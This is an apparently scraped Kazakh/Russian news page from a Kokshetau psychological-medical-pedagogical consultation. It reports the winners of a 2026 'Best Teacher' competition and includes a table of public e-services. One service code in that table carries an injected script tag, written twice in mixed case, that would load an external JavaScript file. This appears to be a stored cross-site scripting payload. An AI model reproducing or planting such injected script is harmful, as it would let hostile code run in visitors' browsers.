Ақмола облысы білім басқармасының "Көкшетау қаласы, ауданаралық психологиялық-медициналық-педагогикалық кеңесі" коммуналдық мемлекеттік мекемесі
Коммунальное государственное учреждение "Межрайонная психолого-медико-педагогическая консультация, город Кокшетау" управления образования Акмолинской области

Ұйымдар тізімі

Галерея

Смотреть все>>>

«Үздік педагог» байқауының қорытындылары

15.01.2026

 «Үздік педагог» байқауының қорытындылары
Көкшетау қаласы, ауданаралық психологиялық-медициналық-педагогикалық консультация

Мамандардың кәсіби шеберлігін арттыру, тиімді жұмыс тәжірибесін тарату және психологиялық-медициналық-педагогикалық сүйемелдеу жүйесіндегі педагог-психолог, сурдопедагог, әлеуметтік педагог мамандықтарының беделін нығайту мақсатында «Көкшетау қаласы, ауданаралық психологиялық-медициналық-педагогикалық консультацияның үздік педагогі» атты кәсіби шеберлік байқауы өткізілді.

Байқау психологиялық-медициналық-педагогикалық консультация мамандары үшін маңызды оқиғаға айналып, кәсіби өсуге, заманауи диагностика әдістері мен ерекше білім беру қажеттіліктері бар балаларды сүйемелдеуді енгізуге ұмтылатын педагогтерді біріктірді. Қатысушылар жоғары кәсіби құзыреттілікті, шығармашылық көзқарасты және ПМПК міндеттерін терең түсінетінін көрсетті.

Байқау кезеңдерінде педагогтер өздерінің кәсіби тәжірибесін таныстырып, педагогтың кәсіби құзыреттілігі, жеке жетістіктері мен қасиеттері туралы ақпаратты қамтитын қысқаша бейнеролик — педагогтың бейне-визиткасын ұсынды, қоса берілген техникалық талаптарға сәйкес, ПМПК жағдайында педагог қызметінің ерекшелігіне сай тексеру және кеңес беру жұмыстарын жүргізді, педагог портфолиосын көрсетті, сондай-ақ балалармен және ата-аналармен өзара тиімді қарым-қатынас орнату дағдыларын көрсетті.

Байқау қазылар алқасы барлық қатысушылардың дайындық деңгейінің жоғары екенін, ұсынылған материалдардың өзектілігін және ұсынылған тәсілдердің практикалық маңыздылығын атап өтті. Ерекше назар заманауи диагностикалық құралдарды қолдануға, әр балаға жеке көзқарасқа және кешенді сүйемелдеу қағидаттарын сақтауға аударылды.

Байқау қорытындысы бойынша жүлделі орындар төмендегідей бөлінді:

  • I дәрежелі диплом — Молгаждарова С.Т.;
  • II дәрежелі диплом — Омралинова А.С.;
  • III дәрежелі диплом — Кемешова Г.Н.

Байқаудың барлық қатысушылары тиісті дәрежедегі дипломдармен марапатталды. «ПМПК-дағы үздік педагог» байқауын өткізу кәсіби тәжірибе алмасудың тиімді түрі және мамандарды одан әрі кәсіби жетілуге ынталандыратын маңызды іс-шара екенін растады. Мұндай іс-шаралар психологиялық-медициналық-педагогикалық көмектің сапасын арттыруға және балалар мен отбасыларды сүйемелдеу жүйесін дамытуға ықпал етеді.

Просмотров: 4971


Добавить комментарий



Включить данные в подпись

№ п/п Коды қызметтер тізіліміне сәйкес мемлекеттік қызметтерді Атауы қызметтер Нысанын жүктеу Қызмет online
1 2 3 4 5
1 803018 Мұғалімдерді аттестациялауға құжаттарды қабылдау. Инструкция получения электронной услуги
2 803010-1 Мемлекеттік білім беру ұйымдарындағы бос немесе уақытша бос лауазымға орналасуға конкурсқа қатысу үшін мұғалімдерден құжаттарды қабылдау. Инструкция получения электронной услуги
3 00402006<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt> Жергілікті атқарушы органдар көрсететін психологиялық-педагогикалық қолдау көрсету саласындағы мемлекеттік қызметтерді көрсету қағидаларын бекіту туралы» Инструкция получения электронной услуги
Текст